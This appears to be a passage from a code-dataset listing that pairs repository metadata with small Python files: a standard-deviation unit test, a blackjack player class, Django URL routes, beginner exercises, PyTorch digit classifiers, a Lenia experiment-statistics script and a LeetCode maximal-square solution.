19.065494398694895, 20.371646308861077, 19.941000225665718,
20.204460151164653, 18.947481949383747, 16.459877952834979,
11.294674261202355, 8.0265482410975864, 9.2898478040397627,
11.14332904576645, 11.873670966563889, 12.684673166200744,
13.797316164143426, 16.063193435096697, 15.897444378823213,
15.397173477983268, 12.449335591374611]
def test_standard_deviation_period_6(self):
period = 6
std = standard_deviation.standard_deviation(self.data, period)
np.testing.assert_array_equal(std, self.std_period_6_expected)
def test_standard_deviation_period_8(self):
period = 8
std = standard_deviation.standard_deviation(self.data, period)
np.testing.assert_array_equal(std, self.std_period_8_expected)
def test_standard_deviation_period_10(self):
period = 10
std = standard_deviation.standard_deviation(self.data, period)
np.testing.assert_array_equal(std, self.std_period_10_expected)
def test_standard_deviation_invalid_period(self):
period = 128
with self.assertRaises(Exception) as cm:
standard_deviation.standard_deviation(self.data, period)
expected = "Error: data_len < period"
self.assertEqual(str(cm.exception), expected)
| [
"kyle@collectiveidea.com"
] | kyle@collectiveidea.com |
bd3b694a9266d7f863265fecde1124c15d651c67 | 7ef38efaf19daca871d7421fe3c7004065fd233c | /player.py | d86191a1dcdbde5fa45afd20876dd933de17266d | [] | no_license | T-Mahfouz/21Jack_python | 74b4dec8a8ee4fa4596177f1ea76a86caddb2dcc | 5083fe2f952f1b021520a3010493226397dcf3d0 | refs/heads/master | 2023-07-02T22:24:58.195838 | 2021-08-09T12:49:24 | 2021-08-09T12:49:24 | 394,289,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,486 | py | import random
from card import Card
import helper
class Player:
def __init__(self, name):
self.name = name
self.cards = []
self.aces_cards = []
self.not_aces_cards = []
self.total = 0
self.initiate_cards()
def initiate_cards(self):
self.visible = self.get_random_card()
self.cards.append(self.visible)
self.cards.append(self.get_random_card())
def get_random_card(self):
rand = random.randrange(0, 12, 1)
card = helper.get_cards_list()[rand]
return Card(card['name'], card['value'])
def pick_card(self):
card = self.get_random_card()
self.cards.append(card)
def get_ace_cards(self):
for card in self.cards:
if card.name == 'Ace':
self.aces_cards.append(card)
return self.aces_cards
def calculate_cards(self, cards):
total = 0
for card in cards:
total += card.value
return total
def get_total(self):
all_cards_total = self.calculate_cards(self.cards)
ace_cards_total = self.calculate_cards(self.get_ace_cards())
if ace_cards_total > 0 and all_cards_total <= 11:
# ( calculate one of aces as 11 and remove its old value )
self.total = all_cards_total + 10
else:
self.total = all_cards_total
return self.total
| [
"timahfouz262@gmail.com"
] | timahfouz262@gmail.com |
b0f53e1bd61093835a6df15d4df7565c7e99b41b | 5b3eb673f6597b90acc98b48852417982924c5d6 | /ecomsite/urls.py | 12cc0a632714c0c665d4cca61e0bb8cbf394c55b | [] | no_license | ritiksingh8/Buy-It-An-Ecommerce-WebApplication | 3e78d8ca35d167660bdbc5092ddabef41211335c | 6b9fd48e30660fd58ee0b6f3256fdab1b6a9b9a9 | refs/heads/master | 2020-12-01T18:13:46.229547 | 2020-02-16T12:34:15 | 2020-02-16T12:34:15 | 230,723,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | """ecomsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from shop import views as shop_views
from shop.views import ProductDetailView
from users import views as user_views
from django.contrib.auth import views as auth_views
urlpatterns = [
path('admin/', admin.site.urls),
path('about/',shop_views.about,name='about'),
path('',shop_views.index,name='index'),
path('product/<int:pk>/',ProductDetailView.as_view(),name='product-detail'),
path('checkout/',shop_views.checkout,name='checkout'),
path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='users/logout.html'), name='logout'),
path('cart/<str:param1>/<str:param2>/', user_views.new_cart, name='cart'),
path('register',user_views.register,name='register')
]
| [
"ritik.singh@spit.ac.in"
] | ritik.singh@spit.ac.in |
3208b05d0da560dca27f9423abf4a82b2b8c2985 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/30/usersdata/82/9455/submittedfiles/atividade.py | c5d3ff8f09f278a98531a889412358d110818bae | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
n=input('Digite o valor de n:')
i=1
j=n
soma=0
while i<=n:
soma=soma+i/j
i=i+1
j=j-1
print('%.5 f' %soma)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
9ccd664cded01d384a74b70078226710006213ac | cf7fed790b733b9a21ec6c65970e9346dba103f5 | /opencv/gen_sine_table.py | a92197731a8388aa38b098c9704de464791890c8 | [
"MIT"
] | permissive | CospanDesign/python | a582050993efc1e6267683e38dd4665952ec6d40 | a3d81971621d8deed2f1fc738dce0e6eec0db3a7 | refs/heads/master | 2022-06-20T15:01:26.210331 | 2022-05-29T01:13:04 | 2022-05-29T01:13:04 | 43,620,126 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,006 | py | #! /usr/bin/env python3
# Copyright (c) 2017 Dave McCoy (dave.mccoy@cospandesign.com)
#
# NAME is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# NAME is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NAME; If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import argparse
import numpy as np
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
NAME = os.path.basename(os.path.realpath(__file__))
DESCRIPTION = "\n" \
"\n" \
"usage: %s [options]\n" % NAME
EPILOG = "\n" \
"\n" \
"Examples:\n" \
"\tSomething\n" \
"\n"
def main(argv):
#Parse out the commandline arguments
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=DESCRIPTION,
epilog=EPILOG
)
parser.add_argument("-t", "--test",
nargs=1,
default=["something"])
parser.add_argument("-d", "--debug",
action="store_true",
help="Enable Debug Messages")
args = parser.parse_args()
print ("Running Script: %s" % NAME)
if args.debug:
print ("test: %s" % str(args.test[0]))
sine_table = []
for i in range(0, 180):
j = i / 2
#print ("%f" % (j))
k = np.deg2rad(j)
sine_table.append(np.sin(k))
with open("sine_table_float.txt", 'w') as f:
for d in sine_table:
f.write("%f\n" % d)
if __name__ == "__main__":
main(sys.argv)
| [
"cospan@gmail.com"
] | cospan@gmail.com |
60e9881d0417bfd779ab8f261e6d4a6eba1be611 | f2ee087b896000ce500ecdb50d6af3a81c9ea67a | /ex16_read_write_file/ex16.py | 21af6acf9f67a01ada06dcad48bed4c2ac91e3b0 | [] | no_license | billgoo/Learn_Python_the_Hard_Way | 5a029223701f1fd6929afbe51b7cd3bfff3e7410 | a280b4110a10d41edda2e90c817f7a8fbc0cecd6 | refs/heads/master | 2020-05-04T17:39:42.275970 | 2019-08-14T14:28:35 | 2019-08-14T14:28:35 | 179,321,167 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,665 | py | """
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
"""
from sys import argv
script, filename = argv
print(f"We're going to erase {filename}.")
print("If you don't want that, hit CTRL-C (^C).") # KeyboardInterrupt
print("If you do want that, hit RETURN.")
input("?")
print("Opening the file...")
target = open(filename, 'w') # open tries to be safe by making you explicitly say you want to write a file
print("Truncating the file. Goodbye!")
# no need truncate because 'w' mode will first do a truncate then do writing
target.truncate()
print("Now I'm going to ask you for three lines.")
line1 = input("line 1: ")
line2 = input("line 2: ")
line3 = input("line 3: ")
print("I'm going to write these to the file.")
'''
target.write(line1)
target.write("\n")
target.write(line2)
target.write("\n")
target.write(line3)
target.write("\n")
'''
# study drill
target.write(f"{line1}\n{line2}\n{line3}\n")
print("And finally, we close it.")
target.close()
txt = open(filename)
print(f"Here's your file {filename}:")
print(txt.read())
txt.close() | [
"billgoo0813@gmail.com"
] | billgoo0813@gmail.com |
6568be9024a557f8279c8eca976ed88033d2a183 | 2c7220b474489ea9304c86e069298038a7234bb5 | /classifiers/classifiers.py | e0526676efac5abd81e571e64fe83fc6752ecd46 | [] | no_license | Nadavc220/Domain-Adversarial-Training-of-Neural-Networks-pytorch | 9b3c098439b85c914b9facfff02817aa615aef6b | 526a069cbf6c7b0105d1a68a1b0e0a2e7dce4906 | refs/heads/master | 2022-11-22T14:47:02.667859 | 2020-07-17T13:47:53 | 2020-07-17T13:47:53 | 280,435,514 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,746 | py | import torch
from torch import nn
import torch.nn.functional as F
class MnistClassifier(nn.Module):
"""
A classifier architecture for mnist data.
"""
def __init__(self):
super(MnistClassifier, self).__init__()
# Encoder
# self.conv1 = nn.Conv2d(in_channels=1, out_channels=10, kernel_size=5)
self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=5)
# self.conv2 = nn.Conv2d(in_channels=10, out_channels=20, kernel_size=5)
self.conv2 = nn.Conv2d(in_channels=32, out_channels=48, kernel_size=5)
self.dense1 = nn.Linear(768, 100)
self.dense2 = nn.Linear(100, 100)
self.dense3 = nn.Linear(100, 10)
self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
def forward(self, input):
x = self.encode(input)
x = torch.flatten(x, start_dim=1)
x = self.decode(x)
return x
def encode(self, input):
x = self.conv1(input)
x = F.relu(x)
x = self.max_pool(x)
x = self.conv2(x)
x = F.relu(x)
x = self.max_pool(x)
return x
def decode(self, input):
x = self.dense1(input)
x = F.relu(x)
x = self.dense2(x)
x = F.relu(x)
x = F.dropout(x, training=self.training)
x = self.dense3(x)
x = F.softmax(x, dim=1)
return x
class SvhnClassifier(nn.Module):
"""
A classifier architecture for mnist data.
"""
def __init__(self):
super(SvhnClassifier, self).__init__()
# Encoder
self.conv1 = nn.Conv2d(in_channels=3, out_channels=64, kernel_size=5)
self.conv2 = nn.Conv2d(in_channels=64, out_channels=64, kernel_size=5)
self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3)
# self.dense1 = nn.Linear(128, 3072)
self.dense1 = nn.Linear(512, 3072)
self.dense2 = nn.Linear(3072, 2048)
self.dense3 = nn.Linear(2048, 10)
self.relu = nn.ReLU()
self.max_pool = nn.MaxPool2d(kernel_size=3, stride=2)
def forward(self, input):
x = self.encode(input)
x = torch.flatten(x, start_dim=1)
x = self.decode(x)
return x
def encode(self, input):
x = self.conv1(input)
x = self.relu(x)
x = self.max_pool(x)
x = self.conv2(x)
x = self.relu(x)
x = self.max_pool(x)
x = self.conv3(x)
x = self.relu(x)
return x
def decode(self, input):
x = self.dense1(input)
x = self.relu(x)
x = self.dense2(x)
x = self.relu(x)
x = F.dropout(x, training=self.training)
x = self.dense3(x)
x = F.softmax(x, dim=1)
return x
| [
"nadavc220@gmail.com"
] | nadavc220@gmail.com |
ae8c313063f63d8ca46adb08c54ed25e9c15a211 | 6968c7f9d2b20b5296663829f99a27d184a59fc1 | /experiments/explorations/experiments/experiment_000202/repetition_000002/calc_statistics_per_repetition.py | 782a2e55a6ea5672f1258b531b384649ad3979d5 | [
"MIT"
] | permissive | flowersteam/automated_discovery_of_lenia_patterns | d42dff37323d51732571b33845c0562d844f498f | 97cc7cde2120fa95225d1e470e00b8aa8c034e97 | refs/heads/master | 2020-06-29T07:08:58.404541 | 2020-05-14T07:37:10 | 2020-05-14T07:37:10 | 200,470,902 | 13 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,282 | py | import exputils
import autodisc as ad
import os
import imageio
import numpy as np
import torch
import importlib
from torch.autograd import Variable
from sklearn.manifold import TSNE
tsne = TSNE(n_components=2, init='pca', random_state=0)
def collect_final_observation(explorer):
data = dict()
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
# rescale values from [0 1] to [0 255] and convert to uint8 for saving as bw image
img_data = run_data.observations.states[-1] * 255
img_data = img_data.astype(np.uint8)
png_image = imageio.imwrite(
imageio.RETURN_BYTES,
img_data,
format='PNG-PIL')
data['{:06d}.png'.format(run_data.id)] = png_image
return data
def collect_observations(explorer):
timestamps = [0, 24, 49, 74, 99, 124, 149, 174, 199]
data = dict()
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
for timestamp in timestamps:
# rescale values from [0 1] to [0 255] and convert to uint8 for saving as bw image
img_data = run_data.observations.states[timestamp] * 255
img_data = img_data.astype(np.uint8)
png_image = imageio.imwrite(
imageio.RETURN_BYTES,
img_data,
format='PNG-PIL')
data['{:06d}_{:06d}.png'.format(run_data.id, timestamp)] = png_image
return data
def collect_representation(explorer):
data = dict()
data_representations = []
n_runs = explorer.data.__len__()
if hasattr(explorer.config.goal_space_representation, 'type') and explorer.config.goal_space_representation.type == 'pytorchnnrepresentation':
if type(explorer).__name__.lower() == 'goalspaceexplorer':
explorer_type = 'pretrainVAE'
elif type(explorer).__name__.lower() == 'onlinelearninggoalexplorer':
explorer_type = 'onlineVAE'
model = explorer.goal_space_representation.model
n_dims_goal_space = model.n_latents
representation_legend = ['dim {}'.format(dim) for dim in range(n_dims_goal_space)]
else:
explorer_type = 'HF'
model = None
representation_legend = explorer.config.goal_space_representation.config.statistics
n_dims_goal_space = len(explorer.config.goal_space_representation.config.statistics)
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
# fixed representation stored in run_data.reached goal
if explorer_type == 'HF' or explorer_type == 'pretrainVAE': #
data_representations.append(run_data.reached_goal)
# online version: recompute the reached goal with last trained VAE
elif explorer_type == 'onlineVAE':
final_observation = run_data.observations.states[-1]
input_img = Variable(torch.from_numpy(final_observation).unsqueeze(0).unsqueeze(0).float())
outputs = model(input_img)
representation = outputs['mu'].cpu().data.numpy().reshape(n_dims_goal_space)
data_representations.append(representation)
data['representation_type'] = explorer_type
data['n_runs'] = n_runs
data['n_dims_goal_space'] = n_dims_goal_space
data['representation_legend'] = representation_legend
data['coordinates_in_goal_space'] = data_representations
data['coordinates_in_tsne_space'] = tsne.fit_transform(np.asarray(data_representations))
return data
# def load_data(experiment_directory):
#
# dh = ad.ExplorationDataHandler.create(directory=os.path.join(experiment_directory, 'results'))
# dh.load(load_observations=False, verbose=True)
#
# dh.config.save_automatic = False
# dh.config.load_observations = True
# dh.config.memory_size_observations = 1
#
# return dh
def load_explorer(experiment_directory):
# load the full explorer without observations and add its config
explorer = ad.explorers.GoalSpaceExplorer.load_explorer(os.path.join(experiment_directory, 'results'), run_ids=[], load_observations=False, verbose=False)
explorer.data.config.load_observations = True
explorer.data.config.memory_size_observations = 1
spec = importlib.util.spec_from_file_location('experiment_config', os.path.join(experiment_directory, 'experiment_config.py'))
experiment_config_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(experiment_config_module)
explorer.config = experiment_config_module.get_explorer_config()
return explorer
if __name__ == '__main__':
experiments = '.'
statistics = [('final_observation', collect_final_observation, 'zip'),
('observations', collect_observations, 'zip'),
('representations', collect_representation),
]
exputils.calc_experiment_statistics(statistics, load_explorer, experiments, recalculate_statistics=False, verbose=True) | [
"chris.reinke@inria.fr"
] | chris.reinke@inria.fr |
667d3a55f26dcbea425733e4d22f03d40b58aea2 | 8f26514c451e2398d5e3688c184ea74d1dad21b2 | /month_01/test_01/test_02.py | 60b70e67643224bf76ad67e8d5c2bc33fc6e5eb3 | [] | no_license | CircularWorld/Python_exercise | 25e7aebe45b4d2ee4e3e3afded082c56483117de | 96d4d9c5c626f418803f44584c5350b7ce514368 | refs/heads/master | 2022-11-21T07:29:39.054971 | 2020-07-20T10:12:24 | 2020-07-20T10:12:24 | 281,081,559 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | '''
2.需求:在终端中获取月份和年份,打印相应的天数.
1 3 5 7 8 10 12 有 31天
2平年有28天,闰年有29天
4 6 9 11 有 30天
步骤:在终端中录入年份和月份,根据逻辑判断 ,显示天数
'''
month = int(input('请输入月份:'))
year = int(input("请输入年份:"))
if month in range(1,13):
if month in (4, 6, 9, 11):
print(f"{year}年{month:02}月有30天")
elif month == 2:
if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:
print(f'{year}是闰年,二月有29天')
else:
print(f'{year}是平年,二月有28天')
else:
print(f"{year}年{month:02}月有31天")
else:
print("输入有误")
| [
"jiayuhaowork@163.com"
] | jiayuhaowork@163.com |
a68573ed34c3fc84071260193d2823ab1d84cc3a | 65a91bb1a2281b54ebef83c40a357e4e1cd4ffc8 | /221_Maximal_Square.py | ef9f9caf9ce43aa0718ce0d1efec9ef675922fbd | [] | no_license | mcao516/LeetCode_Practice | f1e3470bbbb3b13ed3dc04c7d259735a5d78741d | 2f4b74a406e4ae53523a0d958802d76be05f5c37 | refs/heads/main | 2023-04-21T02:16:17.884526 | 2021-05-23T03:14:02 | 2021-05-23T03:14:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | class Solution:
def maximalSquare(self, matrix: List[List[str]]) -> int:
"""
F(i, j, l) = matrix(i, j) and F(i+1, j, l-1) and F(i, j+1, l-1) and F(i+1, j+1, l-1)
"""
m, n = len(matrix), len(matrix[0])
max_size = min(m, n)
F = [[[False] * max_size for _ in range(n)] for _ in range(m)] # [m, n, max_size]
max_length = 0
for l in range(max_size):
for row in range(m-l):
for col in range(n-l):
if l == 0:
F[row][col][l] = matrix[row][col] == "1"
else:
F[row][col][l] = F[row][col][0] and F[row+1][col][l-1] and F[row][col+1][l-1] and F[row+1][col+1][l-1]
if F[row][col][l] and (l + 1) > max_length:
max_length = l + 1
return max_length * max_length | [
"c_meng@outlook.com"
] | c_meng@outlook.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.